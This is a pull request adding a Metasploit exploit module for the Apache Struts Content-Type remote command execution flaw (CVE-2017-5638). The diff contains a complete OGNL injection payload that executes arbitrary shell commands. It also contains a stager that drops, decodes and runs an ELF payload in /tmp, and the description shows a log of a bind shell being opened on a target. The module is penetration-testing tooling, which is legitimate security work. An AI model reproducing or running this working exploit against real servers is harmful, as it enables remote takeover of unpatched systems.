### PR TITLE
Creation of exploit module for struts Content-Type

### DIFF
--- a/modules/exploits/multi/http/struts_content_type_cmd_injection.rb
+++ b/modules/exploits/multi/http/struts_content_type_cmd_injection.rb
@@ -1,0 +1,148 @@
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = GoodRanking
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::EXE
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Apache Struts Content-Type Code Injection',
+      'Description'    => %q{
+          This module exploits a remote command execution vulnerability in
+        Apache Struts versions <= 2.5.10 when trying to handle a misconfigured content type.
+        It has been tested against struts 2.5.10 running on Ubuntu 16.04 using a generic/shell_bind_tcp payload
+      },
+      'Author'         =>
+        [
+          'Dave Gill', # metasploit module
+          'Nike.Zheng', # Vuln discovery
+          'nmask - tengzhangchao', # Python exploit
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          [ 'CVE', '2017-5638'],
+          [ 'URL', 'https://cwiki.apache.org/confluence/display/WW/S2-045'],
+        ],
+      'Platform'      => 'linux',
+      'Privileged'     => true,
+      'Targets'        =>
+        [
+          ['Linux Universal',
+            {
+                'Arch' => ARCH_X86,
+                'Platform' => 'linux',
+            }
+          ],
+        ],
+      'DisclosureDate' => 'Mar 07 2017',
+      'DefaultTarget' => 0))
+
+      register_options(
+        [
+          Opt::RPORT(8080),
+          OptString.new('URI', [ true, 'The path to a struts application action /struts2-showcase/employee/save.action', ""]),
+          OptString.new('EXPCMD', [ false, 'Execute this command', "" ])
+        ], self.class)
+  end
+
+  def send_request(payload)
+    uri =   normalize_uri(datastore['URI'])
+    uri =   Rex::Text::uri_encode(uri)
+    resp = send_request_cgi(
+      'uri'     => uri,
+      'version' => '1.1',
+      'method'  => 'GET',
+      'headers' => {
+        'Content-Type': payload
+      }
+    )
+  end
+
+  def execute_command(cmd)
+    payload = "%{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):"
+    payload << "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])."
+    payload << "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))."
+    payload << "(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear())"
+    payload << ".(#context.setMemberAccess(#dm)))).(#cmd='#{cmd}')."
+    payload << "(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))"
+    payload << ".(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))."
+    payload << "(#p=new java.lang.ProcessBuilder(#cmds))"
+    payload << ".(#p.redirectErrorStream(true)).(#process=#p.start())."
+    payload << "(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))."
+    payload << "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"
+    vprint_status("Attempting to execute: #{cmd}")
+
+    resp = send_request(payload)
+    print_status("Response:#{resp.body}");
+    resp
+  end
+
+  def linux_stager
+    cmds = "echo LINE | tee FILE"
+    exe = Msf::Util::EXE.to_linux_x86_elf(framework, payload.raw)
+    base64 = Rex::Text.encode_base64(exe)
+    base64.gsub!(/\=/, "\\u003d")
+    file = rand_text_alphanumeric(4+rand(4))
+    print_status("File:#{file}")
+    execute_command("touch /tmp/#{file}.b64")
+    cmds.gsub!(/FILE/, "/tmp/" + file + ".b64")
+    base64.each_line do |line|
+      line.chomp!
+      cmd = cmds
+      cmd.gsub!(/LINE/, line)
+      execute_command(cmds)
+    end
+
+    execute_command("base64 -d /tmp/#{file}.b64|tee /tmp/#{file}")
+    execute_command("chmod +x /tmp/#{file}")
+    execute_command("rm /tmp/#{file}.b64")
+
+    execute_command("/tmp/#{file}")
+    @payload_exe = "/tmp/" + file
+  end
+
+  def on_new_session(client)
+    print_warning("Deleting #{@payload_exe} payload file")
+    execute_command("/bin/sh -c rm #{@payload_exe}")
+  end
+
+  def check
+    var_a = rand_text_alpha_lower(4)
+    var_b = rand_text_alpha_lower(4)
+
+    payload = "%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse']"
+    payload << ".addHeader('#{var_a}', '#{var_b}')"
+    payload << "}.multipart/form-data"
+
+    begin
+      resp = send_request(payload)
+    rescue Msf::Exploit::Failed
+      return Exploit::CheckCode::Unknown
+    end
+
+    if resp && resp.code == 200 && resp.headers[var_a] == var_b
+      Exploit::CheckCode::Vulnerable
+    else
+      Exploit::CheckCode::Safe
+    end
+  end
+
+  def exploit
+    unless datastore['EXPCMD'].blank?
+      print_status("Executing command")
+      execute_command(datastore['EXPCMD'])
+      return
+    end
+
+    case target['Platform']
+      when 'linux'
+        linux_stager
+      else
+        fail_with(Failure::NoTarget, 'Unsupported target platform!')
+    end
+
+    handler
+  end
+end


### PR DESCRIPTION
Module to exploits remote command execution vulnerability in trying to handle a misconfigured content type. Targeted specifically at Linux.

Exploits Apache Struts vulnerability 'CVE-2017-5638'

## Verification

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] `use exploit/multi/http/struts_content_type_cmd_injection `
- [ ] `set RHOST 192.168.1.7`
- [ ] `set RPORT 8081`
- [ ] `set URI set URI /struts2-showcase/employee/save.action`
- [ ] `set PAYLOAD generic/shell_bind_tcp`

```
msf exploit(struts_content_type_cmd_injection) > run

[*] Started bind handler
[*] File:g2af
[*] Response:
[*] Response:f0VMRgEBAQAAAAAAAAAAAAIAAwABAAAAVIAECDQAAAAAAAAAAAAAADQAIAABAAAAAAAAAAEAAAAAAAAAAIAECACABAiuAAAACAEAAAcAAAAAEAAAMdtTQ1NqConhamZYzYCWmVJSUlJSUmZoEVxmaAoAieFqHFFWieFDamZYzYCwZrMEzYBSUlaJ4UOwZs2Ak1lqP1jNgEl5+GgvL3NoaC9iaW6J41BTieGwC82A

[*] Response:ELFT�44 ��1�SCSj
��jfX̀��RRRRRRfh\fh
��jQV��CjfX̀�f�̀RRV��C�f̀�Yj?X̀Iy�h//shh/bin��PS���

[*] Response:
[*] Response:
[*] Response:
[*] Command shell session 1 opened (10.0.2.15:41357 -> 192.168.1.7:4444) at 2017-03-21 17:50:17 -0400
[!] Deleting /tmp/g2af payload file
[*] Response:rm: missing operand
Try 'rm --help' for more information.


ls
common
conf
logs
server
shared
webapps
work
```
